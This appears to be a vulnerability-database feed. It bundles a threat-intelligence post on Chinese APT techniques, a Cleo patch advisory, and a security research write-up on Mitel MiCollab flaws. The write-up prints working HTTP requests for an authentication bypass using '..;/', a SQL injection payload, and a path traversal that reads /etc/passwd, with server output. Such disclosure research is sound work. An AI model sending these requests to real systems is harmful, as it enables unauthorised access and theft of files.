https://cve.circl.lu/bundles/feed.atomMost recent bundles.2025-01-13T10:13:05.956901+00:00Vulnerability-Lookupinfo@circl.lupython-feedgenContains only the most 10 recent bundles.https://cve.circl.lu/bundle/c54ba016-1255-4e07-9fb6-686f9a0a936bChinese APT Techniques2025-01-13T10:13:05.974746+00:00Cédric Bonhommehttp://cve.circl.lu/user/cedricChina’s global ambitions continue to grow, and its military strength, technology research and economic powers are giving it an opportunity to challenge the global order of power — particularly the standing of the U.S. China is expected to soon have the military capabilities to take Taiwan by force. In April 2024, Adm. John Aquilino of the U.S. Indo-Pacific Command cautioned China will be capable of invading Taiwan by 2027. Its building of bases and airstrips on contested reefs in the Spratly Islands near the Philippines continues to cause military tensions. On the technology research side, China has invested an estimated US $15 billion — more than three times that of any other country — in quantum computing and is expected to invest as much as US $1.4 trillion in artificial intelligence (AI) in the next six years. And throughout the world, China uses its economic might — via loans and trade initiatives — to increase its influence in places such as Africa and Pacific Island nations.
Fig1
<img src="https://intel471.imgix.net/fig1_2024-11-19-042257_ttne.jpeg?auto=compress%2Cformat&fit=clip&fm=webp&q=80&ratio=auto&w=1600&s=f16f73f40915e28704c68c046234b6b0" width="100%" />
A map of the contested Spratly Islands, a clutch of reefs, shoals and islands in the South China Sea claimed by Brunei, China, Malaysia, Philippines, Taiwan and Vietnam.
Cyber capabilities play a key role in achieving China’s strategic goals, including ensuring partners stay aligned with China and shaping public narratives. This has raised alarms from other governments, which have called for increased vigilance and tightened security. The country’s offensive cyber capabilities have been used for espionage, intellectual property theft and prepositioning of footholds within the critical infrastructure of its adversaries. U.S. intelligence assesses these stealthy malware infections are intended to accomplish disruptive or destructive attacks in the event of a conflict. These campaigns have targeted government and civilian infrastructure at scale. U.S. FBI Director Christopher Wray said China “has a bigger hacking program than every other major nation combined. In fact, if each one of the FBI’s cyber agents and intelligence analysts focused exclusively on the China threat, China’s hackers would still outnumber FBI cyber personnel by at least 50 to 1.”
Espionage traditionally has been shrouded in secrecy, but this is changing. In the past 18 months, governments have disclosed suspected Chinese state-sponsored cyber activities to build public security awareness. The transparency drive correspondingly has driven a change in the advanced persistent threat (APT) landscape. As a result, Chinese state-sponsored cyber threat actors have adapted to global geopolitical developments in 2024 by updating their tactics, techniques and procedures (TTPs) and tool sets to avoid their campaigns being linked to Beijing. Threat actors with a China nexus are emphasizing stealth now more than ever by weaponizing network edge devices, using living off-the-land (LOTL) techniques and setting up operational relay box (ORB) networks.
This post is derived from Intel 471’s Cyber Geopolitical Intelligence, a service that offers insights and analysis of political activity and significant regional events, including China, Iran and Russia, and how those events impact the cyber threat landscape. This post will discuss some of the state sponsored campaigns linked to China and what techniques will likely continue to trend. For more information, please contact Intel 471.
### Zero-Day Exploits
Chinese APT groups will move away from traditional initial access methods such as social engineering to exploit zero-day vulnerabilities against network edge devices for mass exploitation. Edge devices and services such as firewalls and virtual private network (VPN) gateways increasingly have become popular targets. These devices are internet facing and provide critical services to remote users, but they also are not easily monitored by network administrators due to the lack of endpoint detection and response (EDR) solutions installed. This provides a “rapid route to privileged local or network credentials on a server with broad access to the internal network” of a target organization, according to research from WithSecure.
Edge-related common vulnerabilities and exposures (CVEs) added to the Known Exploited Vulnerabilities catalog of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) increased from two per month in 2022 to 4.75 in 2024. Conversely, non-edge entries dropped from 5.36 in 2023 to three in 2024. Additionally, an estimated 85% of known zero-days exploited by Chinese nation-state groups since 2021 were against public-facing appliances, which supports a growing trend that attackers are singling out edge devices for mass exploitation.
The Chinese threat group Volt Typhoon aka Vanguard Panda, Bronze Silhouette, Dev-0391, UNC3236, Voltzite, Insidious Taurus discovered in mid-2021 often relies on exploiting zero-day vulnerabilities. The group targets critical infrastructure, such as communications, energy, transport and utilities, including water and wastewater facilities. The group’s “choice of targets and pattern of behavior is not consistent with traditional cyber espionage or intelligence-gathering activities,” according to a U.S. advisory. Volt Typhoon targets public-facing appliances — routers, VPNs and firewalls — in campaigns the U.S. assesses with high confidence are intended to preposition themselves on devices to disrupt them if needed. The U.S. government announced in January 2024 it had disrupted a botnet assembled by Volt Typhoon and used to attack critical infrastructure. The botnet was assembled using the KV malware, which infected hundreds of small office-home office routers (SOHO) — most of which were out of support and no longer receiving security updates.
Several of the largest cyberattacks in 2023 related to vulnerabilities in edge devices or enterprise appliances. On May 23, 2023, Barracuda disclosed CVE-2023-2868, a zero-day vulnerability in its Email Security Gateway (ESG). As early as Oct. 10, 2022, a threat actor group sent emails to potential victims with malicious files intended to exploit ESG. Mandiant identified the group as UNC4841, a cyber espionage group that acts in support of China.
In early 2021, a group known as Silk Typhoon (under Microsoft’s current threat actor naming scheme) exploited a series of zero-day vulnerabilities, including CVE-2021-26855 in the on-premises version of Microsoft’s Exchange email server. The attack could be launched remotely against an Exchange server on port 443. Tens of thousands of Exchange servers were exploited using the vulnerabilities — collectively known as the ProxyLogon flaws — in the days before Microsoft deployed patches.
How does China source these zero-day vulnerabilities? Increasingly, domestically. Chinese security researchers are talented and prolific. Chinese teams in the 2010s saw success at international Capture the Flag and hacking competitions such as DEF CON and Pwn2Own. But in 2017, Beijing started to pressure private sector security researchers to prevent them from sharing knowledge at overseas cybersecurity events. Authoritative Chinese information security experts also asserted that knowledge of undisclosed software vulnerabilities “should remain in China.” In the ensuing years, the Chinese Communist Party (CCP) incorporated the use of security flaws into its national military-civil fusion strategy that aims to acquire foreign intellectual property, key research and high-value information.
China now uses bug-bounty programs, hacking competitions, universities and private entities to collect information on zero-day vulnerabilities in popular software and products. By mandating that security researchers disclose zero-day vulnerabilities to state authorities first, Beijing provides an operational window for nation-state cyber perpetrators to exploit these vulnerabilities for cyber espionage and intelligence gathering. One example of this arrangement played out in 2022. Microsoft reported an Exchange vulnerability tracked as CVE-2021-42321 that was exploited in the wild three days after the security flaw was revealed at the Tianfu Cup, an annual hacking competition held in Chengdu, Sichuan.
### Living Off the Land
Rather than develop highly sophisticated custom malware, nation-state groups increasingly will use LOTL techniques to maintain persistence and undetected access on information technology (IT) networks. LOTL techniques use legitimate tools, features and functions available in a target environment to traverse networks and hide within normal network activity, reducing the likelihood of the attacker’s presence being flagged as suspicious. In 2023, the Chinese APT groups Flax Typhoon aka RedJuliett, Ethereal Panda and Volt Typhoon leveraged legitimate tools and utilities that were built into the Windows operating system to target key sectors in the U.S., Taiwan and elsewhere. Some of the tools they used included wmic, ntdsutil, netsh and PowerShell.
In August 2023, the China-linked cyber espionage group BlackTech used LOTL techniques such as NetCat shells and modifying the victim registry to enable remote desktop protocol (RDP). In July 2024, the Chinese-speaking APT group Ghost Emperor resurfaced after an extended period of inactivity with new obfuscation techniques, including the use of living-off-the-land binaries (LOLBins) such as reg.exe and expand.exe within the batch file that initiated the infection chain on the compromised machine to achieve stealth.
### Compromised Infrastructure
Chinese ORB networks will continue to develop and mature at pace, reducing APT groups’ dependency on conventional actor-controlled infrastructure. ORB networks are global infrastructures of virtual private servers (VPSs) and compromised smart devices and routers. The extensive networks of proxy devices allow their administrators to scale up and create a “constantly evolving mesh network” to conceal espionage operations. While ORB networks have existed for years, Chinese ORBs in particular have increased in popularity and sophistication in recent years. Each of China’s ORBs is maintained by either private companies or state-sponsored entities and facilitates multiple threat clusters at any given time.
The Mulberry Typhoon aka APT5, Bronze Fleetwood, Keyhole Panda, Manganese, Poisoned Flight, TABCTENG, TEMP.Bottle and Nylon Typhoon aka ke3chang, APT15, Vixen Panda, Nickel groups used the SPACEHOP network to conduct network reconnaissance scanning and exploit vulnerabilities. The Violet Typhoon aka APT31 group and several other actors with a China nexus used the FLORAHOX ORB network to proxy traffic from a source and relay it through a Tor network and numerous compromised router nodes to obfuscate the source of the traffic for cyber espionage attacks.
### Assessment
Global geopolitical developments will continue to heavily influence the Chinese APT threat landscape in terms of targeting, tool sets and TTPs. The acceleration of improvements in the cybersecurity posture of numerous key targeted countries has compelled Chinese state-sponsored intelligence forces to become more innovative with their attack strategies.
The use of ORB networks and exploitation of network edge devices emphasize the scalability of their attacks, and all three techniques focus on secrecy. Adopting these techniques would have required a cumulation of upgraded skills, malware and tools that could only be achieved by continuous reconnaissance of target networks and technologies as well as meticulous testing of tools against them over extended periods. Therefore, these changes highly likely reflect a considered, fundamental and permanent shift in Chinese nation-state cyber operations.
In the next six to 12 months, governments and industry regulators worldwide will increase oversight of vital sectors such as energy, public administration, military and defense, technology, manufacturing, telecommunications and media, health care and financial services. Not only will Chinese nation-state threat actors almost certainly continue to pursue these high-value targets, it also is probable they will scale up their operations to conduct global campaigns and target as many entities in each region or sector as possible to maximize their gains at every exploitation.
### Hunt Packages
Intel 471 provides threat hunting capabilities for Chinese APT activity through our threat hunting platform HUNTER471. The following is a non-exhaustive list of hunt packages we have created related to the tactics used by Chinese nation-state threat actors.
These pre-written threat hunt queries can be used to query logs stored in security information and event management (SIEM) or EDR systems to detect potential malicious activity. The queries are compatible with a variety of security tools and products, such as CarbonBlack Cloud - Investigate, CarbonBlack Response, CrowdStrike, CrowdStrike LogScale, Elastic, Microsoft Defender, Microsoft Sentinel, Palo Alto Cortex XDR, QRadar Query, SentinelOne, Splunk and Trend Micro Vision One. Register for the Community Edition of HUNTER471, which contains sample hunt packages at no cost.
Fig2
A screenshot of hunt packages available in HUNTER471 related to finding behaviors associated with the threat actor group Volt Typhoon.
#### WMIC Windows Internal Discovery and Enumeration
This package will identify the potential malicious use of Windows Management Interface (WMI) for local enumeration and discovery of a host.
#### Obfuscated PowerShell Execution String - Potential Malware Execution
Many adversaries use obfuscated commands involving different techniques to implement and use Base64 strings. This package identifies popular characteristics deployed by many actors utilizing this technique.
#### Enabling Remote Desktop Protocol (RDP) - Possible SmokedHam Activity (Commandline Arguments)
This content is designed to detect when command-line arguments are executed to modify the registry key that enables or disables RDP capabilities (HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server OR HKLM\SYSTEM\ControlSet00*\Control\Terminal Server). False positives may occur depending on the environment per company, as these registry keys can be modified by admins.
#### Dump Active Directory Database with NTDSUtil - Potential Credential Dumping
This content is designed to identify when NTDSutil.exe is used to create a full backup of Active Directory.
#### Netsh Port Forwarding Command
This use case is meant to identify the netsh port forwarding command-line parameters "interface portproxy add."
#### Restricted Admin Mode Login - Possible Lateral Movement
This hunt package is meant to capture the surrounding activity when a user successfully logs in (Event Code 4624) using RDP with restricted admin mode enabled.
2024-12-06T06:18:54.913860+00:00https://cve.circl.lu/bundle/cb44f848-2e46-430a-b089-517177296c87Cleo Product Security Update - CVE-2024-55956 and CVE-2024-506232025-01-13T10:13:05.974682+00:00Alexandre Dulaunoyhttp://cve.circl.lu/user/adulau# Cleo Product Security Update - CVE-2024-55956
Patch Version 5.8.0.24 Made Available to Address Previously Reported Critical Vulnerability (CVE-2024-55956)
Cleo strongly advises all customers to immediately upgrade instances of Harmony, VLTrader, and LexiCom to the latest released patch (version 5.8.0.24) to address this vulnerability.
The vulnerability affects only the following products:
- Cleo Harmony® (prior to version 5.8.0.24)
- Cleo VLTrader® (prior to version 5.8.0.24)
- Cleo LexiCom® (prior to version 5.8.0.24)
This security patch (version 5.8.0.24) addresses the previously identified critical vulnerability (CVE-2024-55956)) in Cleo Harmony, VLTrader, and LexiCom that could allow an unauthenticated user to import and execute arbitrary bash or PowerShell commands on the host system by leveraging the default settings of the Autorun directory.
Please visit [Unauthenticated Malicious Hosts Vulnerability to take immediate action.](https://support.cleo.com/hc/en-us/articles/28389495587095).
# Cleo Product Security Advisory - CVE-2024-50623
Cleo has identified an unrestricted file upload and download vulnerability (CVE-2024-50623) that could lead to remote code execution.
The vulnerability affects the following products:
- Cleo Harmony® (prior to version 5.8.0.21)
- Cleo VLTrader® (prior to version 5.8.0.21)
- Cleo LexiCom® (prior to version 5.8.0.21)
Cleo strongly advises all customers to immediately upgrade instances of Harmony, VLTrader, and LexiCom to the latest released patch (version 5.8.0.21) to address additional discovered potential attack vectors of the vulnerability.
Please visit [Unrestricted File Upload and Download Vulnerability Mitigation](https://support.cleo.com/hc/en-us/articles/27141200982423) to take immediate action.
Unfortunately some of the links are restricted to customers having a support contact.
CVE-2024-12632 is now rejected and a duplicate of CVE-2024-55956.
2024-12-15T14:36:47.345521+00:00https://cve.circl.lu/bundle/0968961a-91c2-4449-84eb-0c177216e719Vulnerabilities in Mitel MiCollab software2025-01-13T10:13:05.974607+00:00Alexandre Dulaunoyhttp://cve.circl.lu/user/adulau# Where There’s Smoke, There’s Fire - Mitel MiCollab CVE-2024-35286, CVE-2024-41713 And An 0day
It is not just APTs that like to target telephone systems, but ourselves at watchTowr too.
We can't overstate the consequences of an attacker crossing the boundary from the 'computer system' to the 'telephone system'. We've seen attackers realise this in 2024, with [hacks against legal intercept systems widely reported in the news.](https://www.forbes.com/sites/thomasbrewster/2024/10/08/the-wiretap-china-has-infiltrated-police-wiretap-systems/?ref=labs.watchtowr.com)
VoIP platforms, which handle telephone calls for an organization, are a really juicy target for an APT. Imagine being able to listen in on the phone calls of your target, as they're happening - or even to interfere with them and block them at will! It's a very powerful thing to be able to do, and a godsend for an outcome-motivated attacker.
And that's before we even look at less complex attacks used by less sophisticated actors, like the classic 'register-a-premium-rate-number-and-call-it-from-hacked-accounts' scam, or the simple 'phone bombing', in which a target line is rendered unusable by a flood of bogus calls.
It is becoming very clear that specific device categories aren’t being targeted anymore. Instead, there’s a feeding frenzy of exploitation on any and all devices that reside in enterprise DMZ’s. No longer can you rest easy thinking that your less-popular branded device will slip through the radar of the APT!
Today we've got a great vulnerability (or two, or even three, depending what you count as 'a vulnerability') for you. We'll talk about all these in turn:
1. Reproducing CVE-2024-35286,
2. Realising we'd found an additional Authentication Bypass vulnerability (CVE-2024-41713),
3. A post-auth Arbitrary File Read that has not yet been patched
All found in Mitel's MiCollab platform.
<img src="https://labs.watchtowr.com/content/images/2024/11/vlcsnap-2024-11-27-14h11m32s913.png" width="100%" />
CVE-2024-35286
--------------
As we're sure you can imagine, keeping on top of the incoming wave of CVE’s and sifting through the trashy vulnerabilities in PHP ‘hair salon booking’ or ‘pizza ordering systems’ which flood our feeds required superhuman strength and patience - but regularly we see gems - like [**CVE-2024-35286**](https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-24-0014?ref=labs.watchtowr.com), a critical pre-authenticated SQL injection in Mitel’s MiCollab software (versions 9.8.0.33 and earlier).
This vulnerability - a SQL injection, CVE-2024-35286 - can supposedly
> huehuehue
be reached only should a specific configuration be in place to expose the `/npm-admin` endpoint. No sensible admin would do this, but it's a trace of smoke that might signal a larger fire - we wanted to dive in and see what was going on.
Part of the reason for our keenness was the relatively high value of the MiCollab suite. For those unfamiliar with Mitel in general, they create a wide range of software for large enterprises and governments in the VoIP space, connecting employees on-the-go and providing conference solutions.
One of these is the software suite MiCollab, which boasts over 16,000 instances across the Internet. MiCollab comprises a softphone application deployed to endpoints and a central server component capable of coordinating telephone calls between endpoints and also to the outside world.
It's like a mini telephone exchange, and it boasts the features you'd expect - voicemail, file sharing, and even desktop sharing so that users can show each other what they're doing.
While it's obvious how dangerous compromise of features such as 'desktop sharing' are, there are usually larger dangers exposed by the telephone function itself.
Users often think of phone calls as more secure than textual communication, and so will frequently use voice-based communication for especially sensitive material. Let's not forget the advent of 'deep fake' technology, too, and the potential for voices to be 'cloned', leading to some crazy social engineering takeovers. CFCA, the Communications Fraud Control Association, [pegs](https://en.wikipedia.org/wiki/Phone_fraud?ref=labs.watchtowr.com) the annual cost of PBX systems alone at almost 5 billion USD - and that's just according to who responded to their survey, admitting they were compromised.
The real number is likely much higher......................
Suffice to say, our interest was firmly piqued by the truly catastrophic consequences of various types of telecom fraud, interception, and just general shenanigans.
We pack a bag of tools for the excursion, and we journey into the forest to inspect the source of the smoke.
Our route was initially blocked, as we couldn’t acquire the software without speaking to salespeople (a hacker’s worst nightmare, second only to podcasting nerds who sub-tweet on Twitter), and so we bit the bullet and "ordered a piece of hardware" (funnily enough it came with a watchTowr.nfo).
Assessing The Winds
-------------------
In the meantime, we looked at the vulnerability's CVE description. We were quite intrigued by the designated component that holds the vulnerability, ‘NuPoint Unified Messaging’:
> A SQL injection vulnerability has been identified in NuPoint Unified Messaging (NPM) component of Mitel MiCollab which, if successfully exploited, could allow a malicious actor to conduct a SQL injection attack.
While the "hardware" still hadn’t arrived on our desks, we were keen to try and find the vulnerability in the wild using a more investigatory mindset.
Typically, if the software is available, the first step is to begin to map out the attack surface through Apache configs, `web.xml` files, and suchlike (as we’ve talked about in our previous blog posts). However, with no software available to us, we looked to ‘open source’ our approach.
A short Google away we discovered a very helpful friend who had dumped the entire Apache config in their quest for technical help over a decade ago. Nice one, Internet Friend!
![](https://labs.watchtowr.com/content/images/2024/11/image-40.png)
Whilst the post is from 2009, typical (enterprise) software doesn’t evolve _that_ drastically over time, and we can already correlate paths that can be reached:
<img src="https://labs.watchtowr.com/content/images/2024/11/image-41.png" width="100%" />
When looking at an Apache config, there are several key directives that dictate paths of interest. For example, we’re keen to look at the following:
* `Location`
* `ProxyPass`
* `RewriteRule`
* `ProxyPassReverse`
* `Alias`
To narrow our search, we tried to focus on routes matching the CVE’s affected **NuPoint Unified Messaging (NPM)** component. It doesn’t take a genius to work out that the following directives are more-than-likely going to be involved:
```
# NuPoint Personal Web GUI URL Rewriting (Port 80)
RewriteEngine on
RewriteRule ^/index\\.html$ https://%{HTTP_HOST}/npm-pwg/loginForm.jsp [R]
RewriteRule ^/login\\.html$ https://%{HTTP_HOST}/npm-pwg/loginForm.jsp [R]
RewriteRule ^/npm-pwg$ https://%{HTTP_HOST}/npm-pwg/loginForm.jsp [R]
RewriteRule ^/npm-pwg/(.*)\\.wav$ <http://127.0.0.1:8080/npm-pwg/$1.wav> [P]
RewriteRule ^/npm-pwg/(.*)\\.tiff$ <http://127.0.0.1:8080/npm-pwg/$1.tiff> [P]
RewriteRule ^/npm-pwg/extendedUmPlayMessage.jsp$ <http://127.0.0.1:8080/npm-pwg/extendedUmPlayMessage.jsp> [P]
RewriteRule ^/npm-pwg/(.*)$ https://%{HTTP_HOST}/npm-pwg/$1 [R]
ProxyPassReverse /npm-pwg/ <http://127.0.0.1/npm-pwg/>
ProxyPassReverse /npm-pwg/ <http://127.0.0.1:8080/npm-pwg/>
```
We discovered that if we access anything under the path `/npm-pwg/`, we’re redirected to the initial starting point of `/portal/`. Perhaps this is just a dead end?
Well, when looking at Apache or Java applications, no ‘smoke investigation kit’ is complete without [Orange Tsai’s trusty research](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf?ref=labs.watchtowr.com) centering around the input `..;/` , which can result in path normalization and the ability to traverse sub-contexts. Let’s apply Orange’s research to this uncooperative `/npm-pwg/` path and see where we end up.
What Is Path Normalization?
---------------------------
To briefly explain Orange Tsai’s amazing research in the context of a Java application residing on Apache/Tomcat, it was discovered that the special syntax `..;/` can be used to truncate paths/traverse out of contexts.
This may all sound a bit confusing, if this is your first time hearing of it. It’s better explained with a straightforward example.
Suppose we have a Tomcat application `application.war` with a proxy such as `Nginx` sitting in front of it. A typical config might look like this:
```
server {
listen 80;
server_name your-domain.com; # Replace with your actual domain
location / {
proxy_pass <http://127.0.0.1:8080/application/servlet>;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}
```
Given the above configuration, all requests to the root of the `Nginx` server are forwarded to the `Tomcat` server with the prefix `/application/servlet` by the `proxy_pass` rule. Straightforward, right?
With the path normalization technique, we can make a request which lands us in the root of the `application` server:
```
GET /..;/test HTTP/1.1
Host: Hostname
```
This would be akin to making the request directly to the application server, normally exposed only to localhost, and has the net effect of expanding the attack surface by quite an amount. Now, we can reach other servlets, never intended to be accessed by the outside world!
Sample Testing For Normalization
--------------------------------
So how do you test for it? If we look at the below Apache configuration line:
```
ProxyPassReverse /npm-pwg/ <http://127.0.0.1:8080/npm-pwg/>
```
We can see that any value supplied after the path `/npm-pwg/` is proxied to a different application server, residing on `http://localhost:8080` (similarly to our example above). We can perform a quick ‘litmus test’ with two URLs, `/npm-pwg/..;/` and `/watchTowr/..;/`, and we see that we get two different 404 pages back for the two URLs, indicating that two different contexts are being reached.
Request:
```
GET /npm-pwg/..;/ HTTP/1.1
Host: {{Hostname}}
```
Response:
```
HTTP/1.1 404 Not Found
Date: Mon, 26 Aug 2024 02:41:06 GMT
Server: Apache-Coyote/1.1
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains
Content-Length: 0
Vary: User-Agent
```
**vs**
Request:
```
GET /watchTowr/..;/ HTTP/1.1
Host: {{Hostname}}
```
Response:
```
HTTP/1.1 404 Not Found
Date: Mon, 26 Aug 2024 02:42:56 GMT
Server: Apache
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>
```
A further `..;/` traversal results in a status code 400, indicative of the context traversal occurring!
So, What Does It All Mean?
--------------------------
Now we’ve confirmed that we’re alive and present within a secondary context, the attack surface has expanded. We can look to see what other routes are present within this context, referring to the trusty list of routes from the original tech support post.
If we look for other routes that reside on the `8080` application server, we can see an interesting path of `/npm-admin/` :
```
ProxyPassReverse /npm-admin/ <http://127.0.0.1:8080/npm-admin/>
```
When trying to request this route at the root path, like a normal user would, we’re met with a boring status of `401 Unauthorized`. However, in conjunction with our traversal, we can reach its content:
```
GET /npm-pwg/..;/npm-admin/ HTTP/1.1
Host: {{Hostname}}
```
<img src="https://labs.watchtowr.com/content/images/2024/11/image-42.png" width="100%" />
Oooh, what’s this?!
Using our emergency toolset of 1337 pentester skillz, we poked and prodded the login page for all sorts of SQL injections and struck gold (albeit in a less-sophisticated-than-expected way).
Who would have guessed - this previously-hidden attack surface has a nice SQLi in the username:
```
POST /npm-pwg/..;/npm-admin/login.do HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
subAction=basicLogin&username=admin'||pg_sleep(4)--&password=admin&clusterIndex=0
```
We’ve found the source of our smoke! This is looking like CVE-2024-35286, which we set out to find. Can we be sure, though? Read on to find out (and find a further 0day!)
![](https://labs.watchtowr.com/content/images/2024/11/image-43.png)
CVE-2024-41713 - Embers In The Blaze
------------------------------------
We were quite confident we had reproduced CVE-2024-35286, the SQL injection we went looking for - but without the patch to correlate against we couldn’t be sure. We contacted Mitel to confirm our findings, who were quite helpful.
With a prompt response from Mitel’s PSIRT team, they were able to validate our assumption -
> Regarding the time-based SQL injection vulnerability, this issue has been addressed and covered in the latest release of MiCollab. We have disclosed this issue through CVE-2024-35286 and issued a security advisory 24-0014.
Great, so our SQL injection finding _was_ CVE-2024-35286 that we were looking for!
However, to our surprise, our approach of using `..;/` was considered unique by Mitel, presenting an entirely different vulnerability altogether. At the time of discovery, no patch was available… a new Authentication Bypass vulnerability had been discovered!
Mitel termed our new prize CVE-2024-41713, and promptly released an [advisory](https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029?ref=labs.watchtowr.com) to update to the fixed version 9.8.2.12 (or follow specific instructions to mitigate; see the advisory for details).
This is quite a find - we've found that no weird configuration is actually required to exploit the original CVE-2024-35286 vulnerability, and have used our trusty `..;/` bypass to spawn a totally new vulnerability, CVE-2024-41713 (see below for remediation advice).
With this new knowledge in hand, we wanted to discover how much further we could go on an unpatched device!
Hardware Accelerant Arrives
---------------------------
Fortunately for us, at this point in our research, the "appliance" itself arrived on our doorstep, ready to be torn apart. Extracting the source code and the software had some hurdles to overcome but we’ll save those for another day.
For those playing along at home, or just trying to outdo us (be our guest, the more vulnerabilities the merrier!), we did our testing on version "9.8 SP1 FP2 (9.8.1.201)".
With a quick `find` command for `war` files, we were quick to ascertain that the context being traversed into via `..;/` landed us into a Tomcat server running from the path `/var/lib/tomcat7/webapps/**`.
Interestingly enough, there’s a plethora of `war` files that can be reached from this perspective, including:
|WAR File |
|-----------------------|
|awcPortlet |
|awv |
|axis2-AWC |
|Bulkuserprovisioning |
|ChangePasscodePortlet |
|ChangePasswordPortlet |
|ChangeSettingsPortlet |
|LoginPortlet |
|massat |
|MiCollabMetting |
|npm-admin |
|npm-pwg |
|portal |
|ReconcileWizard |
|SdsccDistributionErrors|
|UCAProvisioningWizard |
|usp |
Just by making a request to the `war` file `axis2-AWC` we can access, from a pre-authenticated perspective, the `Axis` console and its related services:
Request:
```
GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1
Host: {{Hostname}}
```
<img src="https://labs.watchtowr.com/content/images/2024/11/image-44.png" width="100%" />
Oof! Each `war` file comes with access to various administration consoles, allowing all sorts of nasty techniques to be executed by malicious users - ranging from extracting sensitive information, through creation or modification of users, to a simple denial of service.
<img src="https://labs.watchtowr.com/content/images/2024/11/image-45.png" width="100%" />
FIRE FIRE FIRE - 0day Time!
---------------------------
Whilst poking through the ashes of fresh (and at the time, 0day and unpatched) Authentication Bypass vulnerability, we stumbled across a shiny `war` file that looked interesting - `ReconcileWizard` .
Upon first glance it appears to hold functionality for viewing and saving system reports from the underlying software - nothing particularly interesting.
<img src="https://labs.watchtowr.com/content/images/2024/11/image-46.png" width="100%" />
Just naturally going through the process of clicking buttons and proxying requests we can see references to hardcoded file names embedded in URL-encoded XML data.
We tried our luck with injecting path traversals within the `reportName` tag - and what do you know, we’re able to navigate to that sweet, sweet `/etc/passwd` file:
```
POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 716
_transaction=<@urlencode_all><transaction xmlns:xsi="<http://www.w3.org/2000/10/XMLSchema-instance>" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">2</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><criteria xsi:type="xsd:Object"><reportName>../../../etc/passwd</reportName></criteria><operationConfig xsi:type="xsd:Object"><dataSource>summary_reports</dataSource><operationType>fetch</operationType></operationConfig><appID>builtinApplication</appID><operation>downloadReport</operation><oldValues xsi:type="xsd:Object"><reportName>x.txt</reportName></oldValues></elem></operations><jscallback>x</jscallback></transaction><@/urlencode_all>&protocolVersion=1.0&__iframeTarget__=x
```
```
HTTP/1.1 200 OK
Date: Tue, 09 Jul 2024 16:10:03 GMT
Server: Apache-Coyote/1.1
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains
content-disposition: attachment; filename=../../../etc/passwd
Content-Type: application/javascript;charset=UTF-8
Set-Cookie: JSESSIONID=093D9A50B17E6E3743DC8F075FD58B89; Path=/; Secure; HttpOnly
Vary: Accept-Encoding,User-Agent
Content-Length: 3239
root:x:0:0:root:/root://bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
alias:x:400:400::/var/qmail/alias:/bin/false
qmaild:x:401:400::/var/qmail:/bin/false
qmaill:x:402:400::/var/qmail:/bin/false
qmailp:x:403:400::/var/qmail:/bin/false
qmailq:x:404:401::/var/qmail:/bin/false
qmailr:x:405:401::/var/qmail:/bin/false
qmails:x:406:401::/var/qmail:/bin/false
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
[TRUNCATED]
```
<img src="https://labs.watchtowr.com/content/images/2024/11/image-47.png" width="100%" />
Arbitrary File Read ahoy! - clearly, there’s a lot of fire here in these newly-exposed servlets.
Without diving through the other `war` files just yet, we can safely celebrate that Arbitrary File Read is ours! We've only been inside the first `war` file for 10 minutes, and we're already stumbling into new vulnerabilities; if only bug hunting could always be this easy.
In an effort to dampen the flames, we contacted Mitel again on August 26th to disclose this Arbitrary File Read vulnerability. They informed us on October 12th of their plans to patch, which they scheduled for the first week of December 2024. Unfortunately, we're past this period and have not seen any updates on Mitel's Security Advisory page.
Since our disclosure email was sent over 100 days ago, we've decided to proceed and include this vulnerability within our blog post—but as of writing, it remains unpatched (albeit post-auth).
Proof-of-Concept exploit
------------------------
Of course, a watchTowr blog post wouldn't be complete without an Interactive Artifact Generator—check out our shiny [PoC exploit](https://github.com/watchtowrlabs/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713?ref=labs.watchtowr.com)!
This PoC combines two vulnerabilities - firstly, the as-yet-unnamed Arbitrary File Read, which would normally require authentication, and secondly, the original Authentication Bypass vulnerability tracked as CVE-2024-41713.
Below demonstrates the exploit dumping the `/etc/passwd` file - take a look at it in action:
<img src="https://labs.watchtowr.com/content/images/2024/12/image.png" width="100%" />
Extinguishing The Flames
------------------------
